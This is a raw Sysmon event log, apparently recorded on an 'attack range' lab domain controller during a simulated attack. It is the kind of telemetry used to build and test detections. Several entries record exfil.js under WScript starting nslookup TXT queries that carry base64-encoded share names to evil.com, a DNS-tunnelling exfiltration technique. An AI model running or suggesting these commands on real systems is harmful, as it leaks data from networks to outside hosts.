14:16:04.897{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194050Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.897{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194049Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.897{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194048Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.897{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A4-629A-9F3D-000000005F02}7036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194047Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.897{2E1864BB-17A4-629A-9D3D-000000005F02}51007480C:\Windows\system32\cmd.exe{2E1864BB-17A4-629A-9F3D-000000005F02}7036C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194046Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.898{2E1864BB-17A4-629A-9F3D-000000005F02}7036C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A4-629A-9D3D-000000005F02}5100C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxcujr.tmp 2>&1 10341000x8000000000000000194045Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.876{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A4-629A-9E3D-000000005F02}4712C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194044Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.876{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A4-629A-9E3D-000000005F02}4712C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194043Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.860{2E1864BB-17A4-629A-9E3D-000000005F02}47127736C:\Windows\system32\conhost.exe{2E1864BB-17A4-629A-9D3D-000000005F02}5100C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194042Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.860{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A4-629A-9E3D-000000005F02}4712C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194041Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.845{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194040Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.845{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194039Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.845{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194038Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.845{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194037Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.845{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A4-629A-9D3D-000000005F02}5100C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194036Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.845{2E1864BB-17A1-629A-783D-000000005F02}55527464C:\Windows\System32\WScript.exe{2E1864BB-17A4-629A-9D3D-000000005F02}5100C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194035Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.853{2E1864BB-17A4-629A-9D3D-000000005F02}5100C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dz evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlxcujr.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000194034Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.845{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljny.tmpMD5=DF35AB54482476B9173CEB90AD028262,SHA256=D36A5C0891B34251E0B089204F7A21F9F91A19D06CA659E6438127A003B7EB57,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000194033Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.845{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77395690C7FA6F02A51A53709CC0C9B3,SHA256=9DA40B32FEB49531690B73CD51A82B56D77A213C76A3E8CF09E949BADA0FB5F8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000194032Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.813{2E1864BB-17A4-629A-9B3D-000000005F02}77681104C:\Windows\system32\conhost.exe{2E1864BB-17A4-629A-9C3D-000000005F02}1352C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194031Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.798{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A4-629A-9C3D-000000005F02}1352C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194030Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.798{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194029Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.798{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194028Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.798{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194027Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.798{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194026Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.798{2E1864BB-17A4-629A-9A3D-000000005F02}49086504C:\Windows\system32\cmd.exe{2E1864BB-17A4-629A-9C3D-000000005F02}1352C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000194025Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.812{2E1864BB-17A4-629A-9C3D-000000005F02}1352C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17A4-629A-9A3D-000000005F02}4908C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBBRE1JTiQ= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljny.tmp 2>&1 10341000x8000000000000000194024Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.775{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17A4-629A-9B3D-000000005F02}7768C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194023Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.775{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17A4-629A-9B3D-000000005F02}7768C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194022Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.775{2E1864BB-17A4-629A-9B3D-000000005F02}77681104C:\Windows\system32\conhost.exe{2E1864BB-17A4-629A-9A3D-000000005F02}4908C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194021Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.760{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17A4-629A-9B3D-000000005F02}7768C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000194020Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:04.760{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000194019Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 